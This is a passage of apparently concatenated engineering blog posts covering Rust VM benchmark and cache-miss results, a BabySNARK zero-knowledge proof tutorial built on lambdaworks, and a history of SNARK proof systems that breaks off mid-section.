</span>
Benchmark 2: re_execute_fixed_felt threads: 2</span></span>
  Time (abs ≡):        21.625 s               [User: 41.931 s, System: 1.231 s]</span></span>
</span>
Benchmark 3: re_execute_main_lambdaworks threads: 2</span></span>
  Time (abs ≡):        23.607 s               [User: 45.111 s, System: 1.987 s]</span></span>
</span>
Summary</span></span>
  re_execute_fixed_felt threads: 2 ran</span></span>
    1.09 times faster than re_execute_main_lambdaworks threads: 2</span></span>
    1.31 times faster than re_execute_main threads: 2</span></span>
Running benchmark for 4 threads</span></span>
Benchmark 1: re_execute_main threads: 4</span></span>
  Time (abs ≡):        14.718 s               [User: 56.848 s, System: 1.445 s]</span></span>
</span>
Benchmark 2: re_execute_fixed_felt threads: 4</span></span>
  Time (abs ≡):        11.516 s               [User: 44.374 s, System: 1.264 s]</span></span>
</span>
Benchmark 3: re_execute_main_lambdaworks threads: 4</span></span>
  Time (abs ≡):        12.472 s               [User: 47.662 s, System: 1.627 s]</span></span>
</span>
Summary</span></span>
  re_execute_fixed_felt threads: 4 ran</span></span>
    1.08 times faster than re_execute_main_lambdaworks threads: 4</span></span>
    1.28 times faster than re_execute_main threads: 4</span></span>
Running benchmark for 8 threads</span></span>
Benchmark 1: re_execute_main threads: 8</span></span>
  Time (abs ≡):         7.904 s               [User: 61.202 s, System: 0.705 s]</span></span>
</span>
Benchmark 2: re_execute_fixed_felt threads: 8</span></span>
  Time (abs ≡):         6.186 s               [User: 47.780 s, System: 0.771 s]</span></span>
</span>
Benchmark 3: re_execute_main_lambdaworks threads: 8</span></span>
  Time (abs ≡):         6.800 s               [User: 52.407 s, System: 0.947 s]</span></span>
</span>
Summary</span></span>
  re_execute_fixed_felt threads: 8 ran</span></span>
    1.10 times faster than re_execute_main_lambdaworks threads: 8</span></span>
    1.28 times faster than re_execute_main threads: 8</span></span>
Running benchmark for 16 threads</span></span>
Benchmark 1: re_execute_main threads: 16</span></span>
  Time (abs ≡):         5.248 s               [User: 77.844 s, System: 1.159 s]</span></span>
</span>
Benchmark 2: re_execute_fixed_felt threads: 16</span></span>
  Time (abs ≡):         4.443 s               [User: 65.118 s, System: 1.575 s]</span></span>
</span>
Benchmark 3: re_execute_main_lambdaworks threads: 16</span></span>
  Time (abs ≡):         5.456 s               [User: 80.535 s, System: 1.852 s]</span></span>
</span>
Summary</span></span>
  re_execute_fixed_felt threads: 16 ran</span></span>
    1.18 times faster than re_execute_main threads: 16</span></span>
    1.23 times faster than re_execute_main_lambdaworks threads: 16</span></span>
    </span></span>
Running benchmark for 32 threads</span></span>
Benchmark 1: re_execute_main threads: 32</span></span>
  Time (abs ≡):         5.967 s               [User: 168.953 s, System: 3.411 s]</span></span>
</span>
Benchmark 2: re_execute_fixed_felt threads: 32</span></span>
  Time (abs ≡):         5.345 s               [User: 149.728 s, System: 4.033 s]</span></span>
</span>
Benchmark 3: re_execute_main_lambdaworks threads: 32</span></span>
  Time (abs ≡):         7.010 s               [User: 199.011 s, System: 5.984 s]</span></span>
</span>
Summary</span></span>
  re_execute_fixed_felt threads: 32 ran</span></span>
    1.12 times faster than re_execute_main threads: 32</span></span>
    1.31 times faster than re_execute_main_lambdaworks threads: 32</span></span>
</span>
    1.32 times faster than re_execute_main_lambdaworks threads: 48</span></span></code></pre>
We also ran perf stat</code> to check the cache misses using this new version, and it is indeed more cache efficient, reducing the cache misses by %21 concerning the old MemoryCell implementation with Lambdaworks and 9% less cache misses than the one with Bigints.</p>
$ perf stat -e cache-misses ./binaries/re_execute_fixed_felt sepolia-testnet_0.11.0_47191.sqlite 47000 47191</span></span>
</span>
 Performance counter stats for './binaries/re_execute_fixed_felt sepolia-testnet_0.11.0_47191.sqlite 47000 47191':</span></span>
</span>
        1906296012      cache-misses</span></span>
</span>
       5.278474869 seconds time elapsed</span></span>
</span>
     148.647511000 seconds user</span></span>
       4.168127000 seconds sys</span></span></code></pre>ARM Architecture Considerations</strong></h3>
While we have seen a performance regression related to cache misses in multi-threaded environments for x86_64 architectures, it’s important to note that this issue is not prevalent in systems utilizing ARM CPUs. Our benchmarks, conducted on a MacBook M3 Pro equipped with 18 GB of RAM and 11 cores, showcase a different performance profile.</p>
</p>
In the image, you can notice that:</p>
    * In an SMT context, the ARM-based system displays superior scalability when using the lambdaworks-based MemoryCell struct instead of the BigInt implementation.</span></span>
    * The MemoryCell modifications don't impact the execution performance on ARM systems.</span></span></code></pre>
This distinction in performance between ARM and more traditional x86_64 processors (such as those from Intel or AMD) can be attributed to architectural differences in cache management and bigger cache line sizes (128 bytes in the Apple Silicon processors). ARM processors are designed with a unique approach to cache utilization, wherein individual cores possess dedicated cache resources. This design choice prevents the scenario of cache contention where two cores compete for the same cache lines, a situation that can lead to increased cache misses.</p>
Conclusion</h2>
So all is well and nice, but two questions remain: Why didn’t we see this before, and how do we ensure we see it in the future? How can we improve our engineering processes by considering what we learned?</p>
Our benchmarks modeled a workload without the necessary concurrency to surface the issue.</p>
To ensure a performance regression test, we need to write some code that will trigger it in the right circumstances, a minimal version of re_execute</code> that will allow us to vary parameters to cover a broader area of the problem space (number of VMs running in parallel, number of threads, number of processors used, processor architecture, etc.).</p>
Two lessons learned (or rather, reinforced) are:</p>
    1. Don’t assume your code will only run under specific workloads. Try to model the real world as much as possible and measure to make sure.</span></span>
</span>
    2. Don’t assume that a change to the code that shows a performance improvement measured “locally” will positively impact the overall performance of the entire program.</span></span></code></pre>
This experience highlights that achieving maximum performance in Rust often requires consideration of lower-level details beyond merely using enums. It underscores the importance of understanding and optimizing CPU cache behavior in performance-sensitive applications.</p>
By rethinking our approach to data storage and access and getting a little creative with our structures, we’ve reduced cache misses and significantly improved the scaling of our VMs on multicore systems.</p>


Implementing BabySNARK in lambdaworks in our internal bootcamp
Unknown — Wed, 28 Feb 2024 00:00:00 +0000
Introduction</h2>
We started with an internal bootcamp two weeks ago to onboard new engineers to our team. We wanted to give the basic building blocks in cryptography and also an introduction to zero-knowledge proofs (ZKP) using lambdaworks</a>. Zero-knowledge proofs are a powerful technology that could shape the future in many different ways</a>. For an introduction and a bit of history on the topic, see our previous blog post</a>. Modern proof systems use several tricks and optimizations for increased performance. However, this complicates the learning process since we have to separate the main logic (arithmetization, interpolation, imposing constraints, committing to polynomials) from improvements, some of which are difficult to grasp. We focused on a more straightforward construction, following BabySNARK</a>. During the first week, we covered the basics of finite fields, notions of groups, elliptic curves, hash functions, signatures, public key encryption, and symmetric key encryption schemes. If you are unfamiliar with some topics, we recommend you read our math survival kit</a>.</p>
This blog post will explain the working principle of the proof system and its implementation using lambdaworks (you can check the work in progress here</a>). We hope this will help onboard new people to the fantastic field of ZKP.</p>
Working principle</h2>
Programs as relationships between polynomials</h3>
BabySNARK is based on this NIZK</a> proposed in 2014. It works with square span programs, which are similar to, yet simpler than, quadratic arithmetic programs (used in Pinocchio</a>). The representation of the circuit is done with a matrix $U$ (belonging to $F^{m \times n}$) and a vector $z = (1 , u , w)^t$ (containing the instance $u$ and witness $w$),

$(U.z) \circ (U.z) = 1$</p>
We can express any boolean circuit using these types of constraints. Let us rewrite the equations in a different form that will be convenient for later purposes:

$\left(\sum_j u_{ij} z_j \right)^2 = 1$

which should be valid for every $i = 0, 1, 2, …$. We can encode these equations using polynomials. Suppose that $m = 2^k$ for some $k$ and that we are working with a nice field $F$ containing a subgroup $D_i$ of size $2^k$. We can take $\omega$ as an $m$-th primitive root of unity ($\omega$ generates the whole subgroup) and find the polynomials $U_j (x)$ which satisfy

$U_j (\omega^i ) = u_{ij}$

By doing this, we are encoding our equations as relations over polynomials. Thus, we can replace the problem equivalently,

$\left(\sum_j U_{j} (x) z_j \right)^2 - 1 = p(x)$

If we evaluate the polynomials at $\omega^i$, then we get $U_j (\omega^i ) = u_{ij}$, and $p(\omega^i )$ evaluates to $0$ at every $\omega^i$. A theorem says that if $\omega^i$ is a root/zero of a polynomial $p(x)$, then $x - \omega^i$ divides $p(x)$. In other words, there is some $q (x)$ such that $p(x) = (x - \omega^i )q(x)$.</p>
If the polynomial has multiple zeros, then it must be divisible by each $x - \omega^i$. Let us define $Z(x)$ as the vanishing polynomial over $D_i$

$Z(x) = \prod_j (x -\omega^j ) = x^m - 1$

where we used in the last equality that $\omega$ is a primitive $m$-th root of unity (this trick is also used in STARKs</a>). Therefore, if all the constraints hold, we have a polynomial $q(x)$ which fulfills this equality

$p(x) = Z(x) q(x)$</p>
One way to show that the computation described by the system of equations is valid is by providing $p(x)$ and $q(x)$ and letting the verifier check the equality by himself. The problem is that we have to pass all the coefficients of both polynomials (which are as long as the computation) and let him compute the right-hand side and assert whether it equals the polynomial on the left-hand side. Besides, we also leak information on the witness! How can we turn this into something succinct and not leak information?</p>
Polynomial commitment schemes</h3>
A polynomial commitment scheme is given by four algorithms: setup, commit, open, and evaluate. The commitment allows us to bind ourselves to a given polynomial using short data and later be able to prove things about that polynomial. The commitment scheme must satisfy the following two properties:</p>
    1. Hiding: the commitment does not reveal anything about the committed polynomial.</span></span>
    2. Binding: given the commitment to $p(x)$, $\mathrm{cm} (p)$, it is infeasible to find another $q(x)$, such that $\mathrm{cm} (p) = \mathrm{cm} (q)$</span></span></code></pre>
One way to build a PCS is by using a pairing-friendly elliptic curve, such as BN254 or BLS12-381. We will work here with type-3 pairings, which are functions $e: G_1 \times G_2 \rightarrow G_t$ with the following properties:</p>
    1. Bilinearity: $e(a g_1 , b g_2) = e(g_1 , g_2 )^{ab}$.</span></span>
    2. Non-degeneracy: If $e(P,Q) = 1$, then either $P = \mathcal{O}$ or $Q = \mathcal{O}$.</span></span></code></pre>
KZG commitment scheme</a> works in this setting, which is the tool we will use. Why are pairings useful? Because they provide us with a way of multiplying things hidden inside an elliptic curve group.</p>
We pick a random $s$ (which is unknown to both the prover and verifier), and we generate the following points in the elliptic curve

$\{ P_0 , P_1 , …, P_n \} = \{ g_1 , s g_1 , …, s^n g_n \}$

These points contain the powers of $s$ hidden inside a group of the elliptic curve. Given any $P_k$, recovering $s$ is computationally intractable due to the hardness of the discrete log problem over elliptic curves.</p>
We commit to the polynomial by computing

$p(s) g_1 = \sum a_k (s^k g_1 ) = \sum a_k P_k$

where $g_1$ is a generator of the group/subgroup of prime order $r$ of the elliptic curve. We could also commit using elements in $G_2$, where we have $g_2$ as a subgroup generator.</p>
Using pairings, we could prove the relationship between the polynomial $p(x)$ and the quotient $q(x)$ by computing two pairings and checking their equality:

$e( p(s) g_1 , g_2) = e(g_1 , g_2 )^{p(s)}$

$e(q(s) g_1 , s^m g_2 - g_2) = e(g_1 , g_2 )^{ q(s)(s^m - 1)}$

Since $s$ is chosen at random, if $p(s) = q(s) Z(s)$, then with overwhelming probability, we have that $p(x) = q(x) Z(x)$.</p>
With this construction, we do not need to supply the verifier with the coefficients of the polynomials, only their commitments. This solves part of the problem but not everything.</p>
Intuition for the protocol</h3>
The program/circuit that we want to prove is defined by the matrix $U$. When we define a particular instance/public input $u$ to the circuit, if $u$ is valid, we should be able to find some $w$ that solves the system of equations. To make the proof succinct, we should send much less information than the full witness (besides, if we want zero-knowledge, the witness should be kept secret).</p>
We have the polynomial $p(x)$ of the problem, the vanishing polynomial $Z(x)$, and the quotient $q(x)$. In the end we want to prove that

$p(x) = Z(x)q(x)$

if the computation is valid. $Z(x)$ is known to both the prover and the verifier, and we could even commit to $Z(x)$ as part of the public information. We can reduce this check to just one point $x = s$ and verify this using pairings. However, this check alone would be insufficient since the prover could provide any polynomial $p(x)$. If we recall how we build $p(x)$,

$\left(\sum_j U_{j} (x) z_j \right)^2 - 1 = p(x)$

Some terms in the summation can be computed by the verifier (since these are public). However, the verifier does not know the witness’s terms, and we do not want to give him access to that data in total. The solution would be for the prover to give the summation, including only the values of the witness,

$$V_w (x) = \sum_{j \in w} w_j U_j(x)$$

Moreover, we can provide a commitment to $V_w (x)$ using the commitment scheme we had before, $V_w (s) g_1$ and $V_w (s) g_2$ (we will show why we need both soon). The verifier can then compute

$$V_u (x) = \sum_{k \in u} u_j U_j(x)$$

and get $V_u (s) g_1$ and $V_u (s) g_2$. The verifier can compute the pairing involving $e( p(s) g_1 , g_2)$ in an equivalent way,

$$e ( V_u (s) g_1 + V_w(s) g_1 , V_u (s) g_2 + V_w(s) g_2 ) e ( g_1 , g_2 )^{ - 1 } = e( p(s) g_1 , g_2)$$

This looks odd, but if we take all the scalars to the exponent, we have $(V_u (s) + V_w (s))(V_u (s) + V_w (s)) - 1$, and the verifier can get the polynomial of the circuit. So, we get the first check,

$$e ( V_u (s) g_1 + V_w(s) g_1 , V_u (s) g_2 + V_w(s) g_2 ) e ( g_1 , g_2 )^{ - 1 } = e( q(s) g_1 , Z(s)g_2)$$</p>
We have one problem, though. How do we know that the prover used the same $V_w (x)$ in both commitments? Luckily, we can solve this with another pairing check,

$e( V_w (s) g_1 , g_2 ) = e( g_1 , V_w(s) g_2 )$</p>
We got another check. Finally, how do we know that the verifier computed $V_w (x)$ correctly and did not do some random linear combination that will cancel out with the public input and yield something nice?</p>
We could force the prover to provide the same linear combination, but with the points all shifted by some constant $\beta$, unknown to the parties. We define

$B_w (x) = \sum \beta w_j U_j (x) = \beta V_w (x)$

We can do one final check for this relationship using pairings,

$e( B_w (s) g_1 , \gamma g_2 ) = e( \gamma \beta g_1 , V_w (s) g_2 )$

where $\gamma$ is also unknown to the parties. This makes it impossible for the prover to build fake polynomials for $V_w (x)$. We can see that if this condition did not exist, we could create any $V_w (x) = C Z(x) - V_u (x) + 1$, which would pass all the other checks for any $C$ of our choice. In fact,

$V_w (x) + V_u (x) = C Z(x) + 1$

But $p(x) = (V_w (x) + V_u (x))^2 - 1$, so

$p(x) = C^2 Z(x)Z(x) + C Z(x) = Z(x) (C^2 Z(x) + C)$

and we find that $q(x) = (C^2 Z(x) + C)$, even though we do not know the witness.</p>
The proof $\pi$ will consist of:</p>
    1. The commitment to $V_w (x)$ using $g_1$.</span></span>
    2. The commitment to $V_w (x)$ using $g_2$.</span></span>
    3. The commitment to the quotient polynomial $q(x)$ using $g_1$.</span></span>
    4. The commitment to $B_w (x)$ using $g_1$</span></span></code></pre>
The verification involves six pairings (the pairing $e(g_1 , g_2)^{ - 1}$ can be precomputed since it is a constant), to check the three conditions we mentioned.</p>
To compute the commitments, we need parameters $s , \beta , \gamma$ to be unknown to both parties (hence, they are toxic waste). We need to generate a reference string, which will be circuit dependent (that is because we need to provide $\beta U_j(s) g_1$). With all this, we can jump into the implementation.</p>
Implementation</h2>
Setup</h3>
Prover and verifier agree on a pairing-friendly elliptic curve and generators of the groups $G_1$ and $G_2$, denoted by $g_1$ and $g_2$, respectively. In our case, we choose BLS12-381. The proving key consists of the following:</p>
    1. $\\{s^k g_1 \\}$ for $k = 0, 1, 2 , ... m$</span></span>
    2. $\\{U_j (s) g_1 \\}$ for $j = l , l + 1 , ... m$ ($l$ being the number of public inputs).</span></span>
    3. $\\{U_j (s) g_2 \\}$ for $j = l , l + 1 , ... m$</span></span>
    4. $\\{\beta U_j (s) g_1 \\}$ for $j = l , l + 1 , ... m$</span></span></code></pre>
The verifying key consists of the following:</p>
    1. $\\{U_j (s) g_1 \\}$ for $j = 0 , 1 , ... l - 1$</span></span>
    2. $\\{U_j (s) g_2 \\}$ for $j = 0 , 1 , ... l - 1$</span></span>
    3. $[Z^\prime ] = (s^m - 1)g_2$ (commitment to the vanishing polynomial)</span></span>
    4. $e(g_1 , g_2)^{ - 1}$</span></span>
    5. $\beta \gamma g_1$</span></span>
    6. $\gamma g_2$</span></span></code></pre>Prove</h3>
The steps for the prover are as follows:</p>
    1. Compute $[V_w ] = V_w (s) g_1$, $[V_w^\prime ] = V_w (s) g_2$, and $[B_w ] = B_w (s) g_1$ using the proving key.</span></span>
    2. Compute the polynomial quotient polynomial $q(x)$ from the zerofier $Z(x)$, the vector of witness and instance, and the polynomials describing the circuit $U_j (x)$.</span></span>
    3. Compute $[q ] = q(s) g_1$ using the proving key.</span></span>
    4. Produce the proof $\pi = ( [q] , [V_w ] , [V_w^\prime ] , [B_w ])$</span></span></code></pre>Verify</h3>
The verifier has the following steps:</p>
    1. Parse the proof $\pi$ as $[q] , [V_w ] , [V_w^\prime ] , [B_w ]$.</span></span>
    2. Check $e( [V_w ] , g_2 ) = e( g_1 , [V_w^\prime ])$</span></span>
    3. Check $e( [B_w] , \gamma g_2) = e( \beta \gamma g_1 , [V_w^\prime ])$</span></span>
    4. Compute $[V_u ] = V_u (s) g_1$, and $[V_u^\prime ] = V_u (s) g_2$ using the verifying key.</span></span>
    5. Check $e([V_u ] + [V_w ] , [V_u^\prime ] + [V_w^\prime ])e(g_1 , g_2)^{ - 1} = e( [q] , [Z^\prime])$</span></span></code></pre>
If all checks pass, the proof is valid.</p>
Optimizations</h3>
    1. Interpolation is done using the Fast Fourier Transform (FFT). This is possible because BLS12-381's scalar field has $2^{32}$ as one of its factors.</span></span>
    2. The quotient is calculated in evaluation form, using the FFT. We need to evaluate the polynomials at $\mu \omega^k$, where $\mu$ is the offset (we want to evaluate on cosets because if we evaluate directly over $D_i$, we get $0/0$).</span></span>
    3. The evaluation of the vanishing polynomial is straightforward: $Z(\mu \omega^k ) = (\mu \omega^k )^m - 1 = \mu^m - 1$, because $\omega$ has order $m$.</span></span>
    4. Compute multiscalar multiplications using Pippenger's algorithm.</span></span></code></pre>Turning the SNARK into a zk-SNARK.</h3>
The protocol above is not zero-knowledge since $V_w (x)$ can be distinguished from a random-looking $V (x)$. To make it zero-knowledge, the prover has to sample a random value $\delta$ and make the following changes to the polynomials:</p>
    1. The polynomial $p(x) = \left(\sum_k z_j U_j(x) + \delta Z(x) \right)^2 - 1$. Note that adding $Z(x)$ does not change the main condition, which is that the constraints are satisfied if and only if $p(x)$ is divisible by $Z(x)$.</span></span>
    2. Compute $[V_w ] = (V_w (s) + \delta Z(s)) g_1$, $[V_w^\prime ] = (V_w (s) + \delta Z(s)) g_2$, and $[B_w ] = (B_w (s) + \beta \delta Z(s)) g_1$.</span></span></code></pre>
The verifier’s steps are unchanged.</p>
Summary</h2>
This post covered implementing a simple SNARK based on square span problems. We gave an intuition on how the protocol works and why we need different checks to achieve security. We hope this will enable newcomers to learn some of the basic concepts and workflow for ZKPs.</p>


Our highly subjective view on the history of Zero-Knowledge Proofs
Unknown — Sat, 17 Feb 2024 00:00:00 +0000
Zero-knowledge, Succinct, Non-interactive ARguments of Knowledge (zk-SNARKs) are powerful cryptographic primitives that allow one party, the prover, to convince another party, the verifier, that a given statement is true without revealing anything else other than the validity of the statement. They have gained widespread attention due to their applications in verifiable private computation, providing proof of the correctness of the execution of computer programs and helping scale blockchains. We think SNARKs will have a significant impact in shaping our world, as we describe in our post</a>. SNARKs acts as an umbrella for different types of proof systems, using different polynomial commitment schemes (PCS), arithmetization schemes, interactive oracle proofs (IOP) or probabilistically checkable proofs (PCP). However, the basic ideas and concepts date back to the mid-1980’s. The development significantly accelerated after the introduction of Bitcoin and Ethereum, which proved to be an exciting and powerful use case since you can scale them by using Zero-Knowledge proofs (generally called Validity Proofs for this particular usecase). SNARKs are an essential tool for blockchain scalability. As Ben-Sasson describes, the last years have seen a cambrian explosion of cryptographic proofs</a>. Each proof system offers advantages and disadvantages and was designed with certain tradeoffs in mind. Advances in hardware, better algorithms, new arguments, and gadgets result in enhanced performance and the birth of new systems. Many of them are used in production, and we keep pushing the boundaries. Will we have a general proof system for all applications or several systems suited for different needs? We think that it is unlikely that one proof system will rule them all because:</p>
    1. The diversity of applications.</span></span>
    2. The types of constraints we have (regarding memory, verification times, proving times).</span></span>
    3. The need for robustness (if one proof system gets broken, we still have others).</span></span></code></pre>
Even if proof systems change a lot, they all offer a significant property: proofs can be verified quickly. Having a layer that verifies proofs and can be easily adapted to handle new proof systems solves the difficulties associated with changing the base layer, such as Ethereum. To give an overview of the different characteristics of SNARKs:</p>
    * Cryptographic assumptions: collision-resistant hash functions, discrete log problem over elliptic curves, knowledge of exponent.</span></span>
    * Transparent vs trusted setup.</span></span>
    * Prover time: linear vs superlinear.</span></span>
    * Verifier time: constant time, logarithmic, sublinear, linear.</span></span>
    * Proof size.</span></span>
    * Ease of recursion.</span></span>
    * Arithmetization scheme.</span></span>
    * Univariate vs multivariate polynomials.</span></span></code></pre>
This post will look into the origins of SNARKs, some fundamental building blocks, and the rise (and fall) of different proof systems. The post does not intend to be an exhaustive analysis of proof systems. We focus instead on those that had an impact on us. Of course, these developments were only possible with the great work and ideas of the pioneers of this field.</p>
Fundamentals</h2>
As we mentioned, zero-knowledge proofs are not new. The definitions, foundations, important theorems, and even important protocols were established from mid-1980s. Some of the key ideas and protocols that we use to build modern SNARKs were proposed in 1990s (the sumcheck protocol) or even before the advent of Bitcoin (GKR in 2007). The main problems with its adoption were related to the lack of a powerful usecase (internet was not as developed in the 1990s), and the amount of computational power needed.</p>
Zero-knowledge proofs: the origins (1985/1989)</h3>
The field of zero-knowledge proofs made its appearance in academic literature with the paper by Goldwasser, Micali and Rackoff</a>. For a discussion on the origins, you can see the following video</a>. The paper introduced the notions of completeness, soundness, and zero-knowledge, providing constructions for quadratic residuosity and quadratic non-residuosity.</p>
Sumcheck protocol (1992)</h3>
The sumcheck protocol</a> was proposed by Lund, Fortnow, Karloff, and Nisan</a> in 1992. It is one of the most important building blocks for succinct interactive proofs. It helps us reduce a claim over the sum of a multivariate polynomial’s evaluations to a single evaluation at a randomly chosen point.</p>
Goldwasser-Kalai-Rothblum (GKR) (2007)</h3>
The GKR protocol</a> is an interactive protocol that has a prover that runs linearly in the number of gates of a circuit, while the verifier runs sublinearly in the size of the circuit. In the protocol, the prover and verifier agree on an arithmetic circuit of fan-in-two over a finite field of depth $d$, with layer $d$ corresponding to the input layer and layer $0$ being the output layer. The protocol starts with a claim regarding the output of the circuit, which is reduced to a claim over the values of the previous layer. Using recursion, we can turn this into a claim over the circuit’s inputs, which can be checked easily. These reductions are achieved via the sumcheck protocol.</p>
KZG polynomial commitment scheme (2010)</h3>
Kate, Zaverucha, and Goldberg</a> introduced in 2010 a commitment scheme for polynomials using a bilinear pairing group. The commitment consists of a single group element, and the committer can efficiently open the commitment to any correct evaluation of the polynomial. Moreover, due to batching techniques, the opening can be done to several evaluations. KZG commitments provided one of the basic building blocks for several efficient SNARKs, such as Pinocchio, Groth16, and Plonk. It is also at the heart of the EIP-4844</a>. To get an intuition on batching techniques, you can see our post on the Mina-Ethereum bridge</a>.</p>
Practical SNARKs using elliptic curves</h2>
The first practical constructions for SNARKs appeared in 2013. These required a preprocessing step to generate the proving and verifying keys, and were program/circuit specific. These keys could be quite large, and depended on secret parameters which should remain unknown to the parties; otherwise, they could forge proofs. Transforming code into something that could be proven required compiling the code to a system of polynomial constraints. At first, this had to be done in a manual way, which is time-consuming and error-prone. The advances in this area tried to remove some of the main problems:</p>
    1. Have more efficient provers.</span></span>
    2. Reduce the amount of preprocessing.</span></span>
    3. Having universal rather than circuit specific setups.</span></span>
    4. Avoid having trusted setups.</span></span>
    5. Developing ways to describe circuits using a high-level language, instead of writing the polynomial constraints manually.</span></span></code></pre>Pinocchio (2013)</h3>
Pinocchio</a> is the first practical, usable zk-SNARK. The SNARK is based on quadratic arithmetic programs (QAP). The proof size was originally 288 bytes. Pinocchio’s toolchain provided a compiler from C code to arithmetic circuits, which was further transformed into a QAP. The protocol required that the verifier generate the keys, which are circuit-specific. It used elliptic curve pairings to check the equations. The asymptotics for proof generation and key setup were linear in the computation size, and the verification time was linear in the size of the public inputs and outputs.</p>
Groth 16 (2016)</h3>
Groth</a> introduced a new argument of knowledge with increased performance</a> for problems described by an R1CS. It has the smallest proof size (only three group elements) and fast verification involving three pairings. It also involves a preprocessing step to obtain the structured reference string. The main drawback is that it requires a different trusted setup per program that we want to prove, which is inconvenient. Groth16 was used in ZCash.</p>
Bulletproofs & IPA (2016)</h3>
One of the weak points of the KZG PCS is that it requires a trusted setup. Bootle et al.</a> introduced an efficient zero-knowledge argument system of openings of Pedersen commitments that satisfy an inner product relation. The inner product argument has a linear prover, with logarithmic communication and interaction, but with linear time verification. They also developed a polynomial commitment scheme that does not require a trusted setup. PCS using these ideas are used by Halo 2 and Kimchi.</p>
Sonic, Marlin, and Plonk (2019)</h3>
Sonic</a>, Plonk</a>, and Marlin</a> solve the problem of the trusted setup per program that we had in Groth16, by introducing universal and updatable structured reference strings. Marlin provides a proof system based on R1CS and is at the core of Aleo.</p>
Plonk</a> introduced a new arithmetization scheme (later called Plonkish) and the use of the grand-product check for the copy constraints. Plonkish also allowed the introduction of specialized gates for certain operations, the so-called custom gates. Several projects have customized versions of Plonk, including Aztec, zkSync, Polygon ZKEVM, Mina’s Kimchi, Plonky2, Halo 2, and Scroll, among others.</p>
Lookups (2018/2020)</h3>
Gabizon and Williamson introduced plookup</a> in 2020, using the grand product check to prove that a value is included in a precomputed value table. Though lookup arguments were previously presented in Arya</a>, the construction required the determination of the multiplicities for the lookups, which makes the construction less efficient. The PlonkUp</a> paper showed how to introduce the plookup argument into Plonk. The problem with these lookup arguments was that they forced the prover to pay the price for the whole table, independently of his number of lookups. This implies a considerable cost for large tables, and a lot of effort has been devoted to reducing the cost of the prover to just the number of lookups he uses.

Haböck introduced LogUp</a>, which uses the logarithmic derivative to turn the grand-product check into a sum of reciprocals. LogUp is crucial for performance in the Polygon ZKEVM</a>, where they need to split the whole table into several STARK modules. These modules have to be linked correctly, and cross-table lookups enforce this. The introduction of LogUp-GKR</a> uses the GKR protocol to increase the performance of LogUp. Caulk</a> was the first scheme with prover time sublinear in the table size by using preprocessing time $\mathcal{O}(N \log N)$ and storage $\mathcal{O}(N)$, where $N$ is the table size. Several other schemes followed, such as Baloo</a>, flookup</a>, cq</a> and caulk+</a>. Lasso</a> presents several improvements, avoiding committing to the table if it has a given structure. Besides, Lasso’s prover only pays for table entries accessed by the lookup operations. Jolt</a> leverages Lasso to prove the execution of a virtual machine via lookups</p>
Spartan (2019)</h3>
Spartan</a> provides an IOP for circuits described using R1CS, leveraging the properties of multivariate polynomials and the sumcheck protocol. Using a suitable polynomial commitment scheme, it results in a transparent SNARK with a linear time prover.</p>
HyperPlonk (2022)</h3>
HyperPlonk</a> builds on the ideas of Plonk using multivariate polynomials. Instead of quotients to check the constraints’ enforcement, it relies on the sumcheck protocol. It also supports constraints of a high degree without harming the running time of the prover. Since it relies on multivariate polynomials, there is no need to carry out FFTs, and the prover’s running time is linear in the circuit size. HyperPlonk introduces a new permutation IOP suitable for smaller fields and a sum check-based batch opening protocol, which reduces the prover’s work, proof size, and the verifier’s time.</p>
Folding schemes (2008/2021)</h3>
Nova</a> introduces the idea of a folding scheme, which is a new approach to achieve incrementally verifiable computation (IVC). The concept of IVC dates back to Valiant</a> who showed how to merge two proofs of length $k$ into a single proof of length $k$. The idea is that we can prove any long-running computation by recursively proving that the execution from step $i$ to step $ I + 1$ is correct and verifying a proof that shows that the transition from step $i - 1$ to step $i$ was correct. Nova deals well with uniform computations; it was later extended to handle different types of circuits with the introduction of Supernova</a>. Nova uses a relaxed version of R1CS and works over amicable elliptic curves. Working with amicable cycles of curves (for example, the Pasta curves) to achieve IVC is also used in Pickles, Mina’s main building block to achieve a succinct state. However, the idea of folding differs from recursive SNARK verification. The accumulator idea is more deeply connected to the concept of batching proofs. Halo</a> introduced the notion of accumulation as an alternative to recursive proof composition. Protostar</a> provides a non-uniform IVC scheme for Plonk that supports high-degree gates and vector lookups.</p>
Using collision-resistant hash functions</h2>
Around the same time that Pinocchio was developed, there were some ideas to generate circuits/arithmetization schemes that could prove the correctness of the execution of a virtual machine. Even though developing the arithmetization of a virtual machine could be more complex or less efficient than writing dedicated circuits for some programs, it offered the advantage that any program, no matter how complicated, could be proven by showing that it was executed correctly in the virtual machine. The ideas in TinyRAM were later improved with the design of the Cairo vm, and subsequent virtual machines (such as zk-evms or general purpose zkvms). The use of collision-resistant hash functions removed the need for trusted setups or use of elliptic curve operations, at the expense of longer proofs.</p>
TinyRAM (2013)</h3>
In SNARKs for C</a>, they developed a SNARK based on a PCP to prove the correctness of the execution of a C program, which is compiled to TinyRAM, a reduced instruction set computer. The computer used a Harvard architecture with byte-level addressable random-access memory. Leveraging nondeterminism, the circuit’s size is quasilinear in the size of the computation, efficiently handling arbitrary and data-dependent loops, control flow, and memory accesses.</p>
STARKs (2018)</h3>
STARKs</a> were introduced by Ben Sasson et al. in 2018. They achieve $\mathcal{O}(\log^2 n )$ proof sizes, with fast prover and verifier, do not require a trusted setup, and are conjectured to be post-quantum secure. They were first used by Starkware/Starknet, together with the Cairo vm. Among its key introductions are the algebraic intermediate representation (AIR) and the FRI protocol</a> (Fast Reed-Solomon Interactive Oracle Proof of Proximity). It is also used by other projects (Polygon Miden, Risc0, Winterfell, Neptune) or has seen adaptations of some components (zkSync’s Boojum, Plonky2, Starky).</p>
Ligero (2017)</h3>
Ligero</a> introduces a proof system that achieves proofs whose size is $\mathcal{O}(\sqrt{n})$, where $n$ is the size of the circuit. It arranges the polynomial coefficients in matrix form and uses linear codes.

Brakedown</a> builds on Ligero and introduces the idea of field-agnostic polynomial commitment schemes.</p>
Some new developments</h2>
The use of different proof systems in production showed the merits of each of the approaches, and led to new developments. For example, plonkish arithmetization offers a simple way to include custom gates and lookup arguments; FRI has shown great performance as PCS, leading to Plonky. Similarly, the use of the grand product check in AIR (leading to randomized AIR with preprocessing) improved its performance and simplified memory access arguments. Commitments based on hash functions have gained popularity, based on the speed of hash functions in hardware or the introduction of new SNARK-friendly hash functions.</p>
New polynomial commitment schemes (2023)</h3>
